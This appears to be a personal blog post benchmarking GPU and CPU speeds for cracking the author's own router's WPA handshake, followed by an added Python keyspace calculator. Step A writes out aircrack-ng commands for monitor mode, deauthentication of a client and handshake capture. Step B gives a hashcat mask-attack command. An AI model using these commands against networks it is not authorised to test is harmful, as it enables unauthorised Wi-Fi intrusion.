An interesting alternate use of GPU acceleration (aside from training neural-networks) naturally lies in the realm of password-cracking. I was curious about the speed-up this provided relative to multi-processing on the CPU and decided to try it out myself. First, I need some data.

Step A: Collecting the Data (Capturing my router’s WPA Handshake)

I set up a virtual machine with Kali 2.0 on my MacBook, plugged in my Alfa AWUS036NHA and proceeded with the following commands:

airmon-ng # check the name of my wireless card

airmon-ng check kill # stop processes to restart in monitoring mode

airmon-ng start wlan0 # restart in monitoring mode

airodump-ng wlan0mon # start the sniffer

airodump-ng -c (my router's channel) --bssid (my router's MAC) --essid (my router's network name) -w (name of capture file) wlan0mon # Optionally specifying the network's name just to keep track and make sure I'm not accidentally sniffing a foreign network

Now I am locked onto the channel and the frequency of the SKY router and just need to kick off my iPhone so that it reconnects and I can capture the WPA handshake:

aireplay-ng -0 (number of deauths) -a (my router’s MAC) -c (my iPhone’s MAC) wlan0mon # I issue 10 requests to disconnect my iPhone

The WPA handshake is successfully captured. Now I just need to clean the capture so that it contains only the handshake for Hashcat:

wpaclean (clean output name).cap (input name).cap

Finally converting it into a .hccap file:

aircrack-ng (clean output name).cap -J (final file)

Step B: Hashcat + Nvidia GTX 980

I create a small script (.bat) file with the following lines of code:

cd "C:\cudahash-2.01"
cudaHashcat64.exe -m 2500 -a 3 hash_test\(final file).hccap ?u?u?u?u?u?u?u?u
pause

This type of brute-force attack is called a mask attack and helps me save a great deal of time. I know that SKY routers have 8 upper-case characters (producing a character-space of 208,827,064,576 possibilities).

Now the interesting stuff begins: we notice that GTX 980 is ripping through at a rate of 211,300 keys a second. At that rate we have an expected cracking-duration of around 6 days.

The average speed I was getting on the CPU (using aircrack-ng) was just below 5,000 keys a second -> more than 40x faster!

Using a slightly better CPU (Xeon E5 2687) we can up this to 7,610 keys a second.

In fact, running the same operation on a friend's laptop (GPU-accelerated), we hit 15,000 keys a second (3x faster).

Interestingly, I got lucky and the algorithm cracked in around 7 hours.

As an aside: running on a powerful 16-core server (E5-2667) gets us 16,240 words a second (about the same as a GPU on a mid-level gaming laptop).

Step C: Some lower-cost DIY solutions

The GTX 980 is very expensive and currently stands at around £500 (it was purchased for around £900). I was curious about a cheaper solution (getting cheaper cards on eBay and running the algorithm on multiple cards) and opted for 2 GTX 770s which I found on eBay for around £100 each used.

I decided to mount these on the top of my computer for maximum ventilation with a bit of drilling.

The end result was interesting: hitting around 115,000 keys a second (across both cards). This is relatively more expensive than the GTX 980; however, I think it is a good option for those not willing to knock out £500+ on a graphics card!

Summary (keys per second):
GTX 980X – 211,300
GTX 770 – 55,000
E5-2667 (16 core) – 16,240
Laptop GPU – 15,000
E5-2687 (8 core) – 7,610
i7 4790 (4 core) – 4,530
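
As an added example (not part of the original post), the Python sketch below computes the keyspace of a hashcat-style mask and the time to exhaust it at the rates measured above, which shows how much a longer passphrase buys over the 8-upper-case default. The function names and the 12-character comparison mask are assumptions made for illustration.

```python
# Added example (not from the original post): keyspace of a hashcat-style mask
# and time to exhaust it. Charset sizes are hashcat's built-ins; the rates are
# the keys-per-second figures reported in the post.
CHARSETS = {"l": 26, "u": 26, "d": 10, "h": 16, "H": 16, "s": 33, "a": 95, "b": 256}
RATES = {
    "GTX 980": 211_300,
    "2x GTX 770": 115_000,
    "E5-2667 (16 core)": 16_240,
    "i7 4790 (4 core)": 4_530,
}
SECONDS_PER_DAY = 86_400


def mask_keyspace(mask):
    """Count the candidates a mask generates; literal characters contribute 1."""
    total, i = 1, 0
    while i < len(mask):
        if mask[i] != "?":
            i += 1                      # literal character, one choice
            continue
        if i + 1 >= len(mask):
            raise ValueError("mask ends with a dangling '?'")
        token = mask[i + 1]
        if token != "?":                # '??' is a literal question mark
            if token not in CHARSETS:
                raise ValueError(f"unsupported charset ?{token}")
            total *= CHARSETS[token]
        i += 2
    return total


def days_to_exhaust(mask, keys_per_second):
    """Worst case: every candidate is tried. The expected time is half of this."""
    return mask_keyspace(mask) / keys_per_second / SECONDS_PER_DAY


def report(masks):
    """Rows of (mask, device, expected_days, worst_case_days)."""
    return [(m, dev, days_to_exhaust(m, r) / 2, days_to_exhaust(m, r))
            for m in masks for dev, r in RATES.items()]


if __name__ == "__main__":
    # Constructed comparison: the 8-upper-case mask from the post versus a
    # hypothetical 12-character passphrase drawn from all printable ASCII.
    for mask, dev, avg, worst in report(["?u" * 8, "?a" * 12]):
        print(f"{mask:<24} {dev:<18} expected {avg:12.3g} d  worst {worst:12.3g} d")
```

For the post's mask on the GTX 980, the worst case is about 11.4 days, so the expected time (half of that) matches the "around 6 days" estimate.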